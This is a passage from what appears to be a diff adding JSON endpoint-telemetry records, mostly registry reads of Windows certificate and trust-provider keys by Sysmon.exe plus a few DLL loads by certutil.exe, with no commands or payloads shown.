"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cabinet.dll", + "image_path": "C:\\Windows\\System32\\cabinet.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "normaliz.dll", + "image_path": "C:\\Windows\\System32\\normaliz.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptui.dll", + "image_path": "C:\\Windows\\System32\\cryptui.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 